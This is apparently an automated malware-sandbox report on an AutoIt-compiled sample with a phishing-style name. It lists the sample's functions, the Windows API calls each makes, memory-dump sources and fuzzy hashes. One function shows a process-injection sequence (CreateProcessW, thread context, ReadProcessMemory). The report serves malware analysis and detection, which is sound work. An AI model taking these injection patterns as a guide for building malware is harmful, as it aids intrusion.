                                                                                                          control_flow_graph 1144 75407c-754092 1145 75416f-754173 1144->1145 1146 754098-7540ad call 757a16 1144->1146 1149 78d3c8-78d3d7 LoadStringW 1146->1149 1150 7540b3-7540d3 call 757bcc 1146->1150 1153 78d3e2-78d3fa call 757b2e call 756fe3 1149->1153 1150->1153 1154 7540d9-7540dd 1150->1154 1164 7540ed-75416a call 772de0 call 75454e call 772dbc Shell_NotifyIconW call 755904 1153->1164 1165 78d400-78d41e call 757cab call 756fe3 call 757cab 1153->1165 1156 754174-75417d call 758047 1154->1156 1157 7540e3-7540e8 call 757b2e 1154->1157 1156->1164 1157->1164 1164->1145 1165->1164
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D3D7
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • _memset.LIBCMT ref: 007540FC
                                                                                                          • _wcscpy.LIBCMT ref: 00754150
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00754160
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                          • String ID: Line:
                                                                                                          • API String ID: 3942752672-1585850449
                                                                                                          • Opcode ID: 367aa84e7d4419f3adb30671e90a517a545298703e96840f937cf831b3572ee6
                                                                                                          • Instruction ID: 186175a830248141a1d4bc80ab8081c183fcdf5058aaed98f83f267671a82654
                                                                                                          • Opcode Fuzzy Hash: 367aa84e7d4419f3adb30671e90a517a545298703e96840f937cf831b3572ee6
                                                                                                          • Instruction Fuzzy Hash: E931AF72408704EAD724EB60EC49BDA77DCAF84315F20851EF989921E1DBB8968CC796
                                                                                                          Function 0077541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1559183368-0
                                                                                                          • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                          • Instruction ID: db9f37ee7a4c5b90ee27666892f882eaa44d1f16054f108f49ed92a6b265f1ab
                                                                                                          • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                          • Instruction Fuzzy Hash: DB51C670A00B05DBCF249F69D88456E77A3EF403A1F24C729F83D962D1D7B89D608B41
                                                                                                          Function 0075686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754E0F
                                                                                                          • _free.LIBCMT ref: 0078E263
                                                                                                          • _free.LIBCMT ref: 0078E2AA
                                                                                                            • Part of subcall function 00756A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756BAD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                          • API String ID: 2861923089-1757145024
                                                                                                          • Opcode ID: d41a74ec882317d6c52ab3f708846a864fcb18d0b4aa7b7df6bbb52255e2bb23
                                                                                                          • Instruction ID: c4dd1d1eeec4bc4966228745a29df0af2b3398a55d290eb84b63f335b8dad3d7
                                                                                                          • Opcode Fuzzy Hash: d41a74ec882317d6c52ab3f708846a864fcb18d0b4aa7b7df6bbb52255e2bb23
                                                                                                          • Instruction Fuzzy Hash: 17918F71A40219EFCF08EFA4CC959EDB7B4FF05310F10442AF816AB2A1DBB8A945CB50
                                                                                                          Function 0075F76F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00770193
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0077019B
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007701A6
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007701B1
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007701B9
                                                                                                            • Part of subcall function 00770162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007701C1
                                                                                                            • Part of subcall function 007660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075F930), ref: 00766154
                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075F9CD
                                                                                                          • OleInitialize.OLE32(00000000), ref: 0075FA4A
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007945C8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                          • String ID: %~
                                                                                                          • API String ID: 1986988660-3145668672
                                                                                                          • Opcode ID: a9dff4792a6c1e46ba490ae04aa75593fa959e1586678b462d099e3398b8ddb3
                                                                                                          • Instruction ID: 7829fe9ab11b2aecf4a4a1b383071ed51f6bc788de41e766be4afff47e7fd6e6
                                                                                                          • Opcode Fuzzy Hash: a9dff4792a6c1e46ba490ae04aa75593fa959e1586678b462d099e3398b8ddb3
                                                                                                          • Instruction Fuzzy Hash: DF81A8F0901A80CED384DF69E8856D97BEDFFD9306790C52AD519CB361EBB844888B19
                                                                                                          Function 007535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
                                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 3677997916-824357125
                                                                                                          • Opcode ID: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                                                                                                          • Instruction ID: 133d447f1ac2657b5012535708b880ca1f613b3c0b8a83b51fecbc0a5784075f
                                                                                                          • Opcode Fuzzy Hash: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                                                                                                          • Instruction Fuzzy Hash: D5115A71511208BFDB208F64DC40EEEB7B8EF04781F00846AF805D7220E2B69F5497A4
                                                                                                          Function 00E830F0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00E8391D
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E83941
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E83963
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                          • Instruction ID: d92b54bafbd005c0c405632f72ff5216edc674eabaee55ee00a8c5229b451892
                                                                                                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                          • Instruction Fuzzy Hash: BC620970A14258DBEB24DFA4C850BDEB372EF58700F1091A9E10DFB294E7769E81CB59
                                                                                                          Function 0077470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2782032738-0
                                                                                                          • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                          • Instruction ID: c060c964d0efba3bdce8a60826c27fa73f654c85e56bf448c878264729693eab
                                                                                                          • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                          • Instruction Fuzzy Hash: C4418175B00649ABDF1C8E69C8849AA77A5AF463E0B24C57DE81DCB640EB78DD408B81
                                                                                                          Function 00754C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: AU3!P/~$EA06
                                                                                                          • API String ID: 4104443479-1801474073
                                                                                                          • Opcode ID: bcb56a0e5ff83cb2fc4492caca5414719b30daf5e3aebdfb4d8b2db271a40f14
                                                                                                          • Instruction ID: aa87df1563d626b2ad10f7daf41a7920ad16aaaed40f55ad0503522d648cfef7
                                                                                                          • Opcode Fuzzy Hash: bcb56a0e5ff83cb2fc4492caca5414719b30daf5e3aebdfb4d8b2db271a40f14
                                                                                                          • Instruction Fuzzy Hash: 98417F21B04358A7DF215B64CC557FE7F719B4530AF284074EE82DB282D6AD5DCC83A1
                                                                                                          Function 00757285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 0078EA39
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0078EA83
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                            • Part of subcall function 00770791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007707B0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                          • String ID: X
                                                                                                          • API String ID: 3777226403-3081909835
                                                                                                          • Opcode ID: 8bf225aea67f430e4f04057d3290789037fb132897835cdbd2c661b1c535da7a
                                                                                                          • Instruction ID: a80f77f6ca78a3a83b1860631bc9289333443f248595226807d07504278c8fe6
                                                                                                          • Opcode Fuzzy Hash: 8bf225aea67f430e4f04057d3290789037fb132897835cdbd2c661b1c535da7a
                                                                                                          • Instruction Fuzzy Hash: 3621CF31A00248DBCB459B94DC49AEE7BF8AF48711F00805AE948A7281DBF8598DCBA1
                                                                                                          Function 007B8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                          • Opcode ID: 8a08a58b956a1e3e16c2c36bc1d8028ea1ba2ccff4645c0f6f7775e68bfa1183
                                                                                                          • Instruction ID: dff3cb52ffe96301c2f5ab3a075d1baaa46150c860ef1830253ec45cf3e562da
                                                                                                          • Opcode Fuzzy Hash: 8a08a58b956a1e3e16c2c36bc1d8028ea1ba2ccff4645c0f6f7775e68bfa1183
                                                                                                          • Instruction Fuzzy Hash: 0A01DB71904218BEDF54D7A8C816EE97BF8DB15301F00419FF556D2181E9B9A61487A0
                                                                                                          Function 007B98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 007B98F8
                                                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B990F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Temp$FileNamePath
                                                                                                          • String ID: aut
                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                          • Opcode ID: 9e2cf48b958760c6410771e711ff576eac0c93d8457eeb3619c86a5e3532f7ac
                                                                                                          • Instruction ID: 818d2365def8eb640ed15cedae88875912d69abed50a7d12fab46d455ce3dd29
                                                                                                          • Opcode Fuzzy Hash: 9e2cf48b958760c6410771e711ff576eac0c93d8457eeb3619c86a5e3532f7ac
                                                                                                          • Instruction Fuzzy Hash: 52D05E7954130DABDB50ABA0DC0EF9A773CF704700F0082B2FA95D11A1EAB4A5988B99
                                                                                                          Function 007CCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6be846ed32f54e237965a98f84edfd3c76e0de39ae017a37c1b3cc852ea42ad7
                                                                                                          • Instruction ID: 630e301678f85144535c3635f65f8028f5dda532e8aeb15d1f2bfbdd3c9f221d
                                                                                                          • Opcode Fuzzy Hash: 6be846ed32f54e237965a98f84edfd3c76e0de39ae017a37c1b3cc852ea42ad7
                                                                                                          • Instruction Fuzzy Hash: 38F13971608301DFC714DF28C484A6ABBE5FF89314F14896EF89A9B251D778E945CF82
                                                                                                          Function 0075434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00754370
                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00754415
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00754432
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_$_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1505330794-0
                                                                                                          • Opcode ID: 1840c3731dbc3f01cd9faae832c69fad6699ea3bfe111a1c8efcfff25df86687
                                                                                                          • Instruction ID: 613e84c96bd7e7e66c58a9e95cfaee72681ee096d9471b516a4d8c7e615fb4ea
                                                                                                          • Opcode Fuzzy Hash: 1840c3731dbc3f01cd9faae832c69fad6699ea3bfe111a1c8efcfff25df86687
                                                                                                          • Instruction Fuzzy Hash: E1319371505701DFD720DF24D8846DBBBF8FF48309F00492EE99A97251D7B9A988CB52
                                                                                                          Function 0077571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __FF_MSGBANNER.LIBCMT ref: 00775733
                                                                                                            • Part of subcall function 0077A16B: __NMSG_WRITE.LIBCMT ref: 0077A192
                                                                                                            • Part of subcall function 0077A16B: __NMSG_WRITE.LIBCMT ref: 0077A19C
                                                                                                          • __NMSG_WRITE.LIBCMT ref: 0077573A
                                                                                                            • Part of subcall function 0077A1C8: GetModuleFileNameW.KERNEL32(00000000,008133BA,00000104,?,00000001,00000000), ref: 0077A25A
                                                                                                            • Part of subcall function 0077A1C8: ___crtMessageBoxW.LIBCMT ref: 0077A308
                                                                                                            • Part of subcall function 0077309F: ___crtCorExitProcess.LIBCMT ref: 007730A5
                                                                                                            • Part of subcall function 0077309F: ExitProcess.KERNEL32 ref: 007730AE
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          • RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1372826849-0
                                                                                                          • Opcode ID: 7a7daa180372327fc890250675f93f9dfcad5a71bdf76f5b26dc5a9e92ea9f2f
                                                                                                          • Instruction ID: 965cd44fb03eddf97d81d8bde3e96b2fef7dfc8cddb2767fad8f8b5e14501d72
                                                                                                          • Opcode Fuzzy Hash: 7a7daa180372327fc890250675f93f9dfcad5a71bdf76f5b26dc5a9e92ea9f2f
                                                                                                          • Instruction Fuzzy Hash: 96019275340B05DAEE182738EC4AA6E67589F827E2F50C525F41DEA191DFBC9C0056A1
                                                                                                          Function 007B98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007B9548,?,?,?,?,?,00000004), ref: 007B98BB
                                                                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007B98D1
                                                                                                          • CloseHandle.KERNEL32(00000000,?,007B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B98D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
